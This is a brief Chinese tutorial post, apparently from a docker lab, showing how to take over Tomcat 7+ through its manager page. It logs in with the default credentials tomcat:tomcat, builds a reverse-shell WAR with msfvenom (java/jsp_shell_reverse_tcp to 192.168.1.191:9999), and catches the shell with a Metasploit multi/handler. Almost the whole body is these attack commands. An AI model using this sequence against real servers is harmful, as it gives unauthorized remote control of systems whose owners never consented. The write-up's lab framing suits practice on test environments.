Tomcat7+ 弱口令 && 后台getshell漏洞
原创Tomcat7+ 弱口令 && 后台getshell漏洞
原创
浪子云
修改于 2022-03-27 22:38:01
修改于 2022-03-27 22:38:01
代码可运行
运行总次数:0
代码可运行
docker-compose up -d打开tomcat管理页面`http://your-ip:8080/manager/html`,输入弱密码`tomcat:tomcat`,即可访问后台msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.191 lport=9999 -f war > shell.waruse exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.1.191
set lport 9999
exploit -j
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
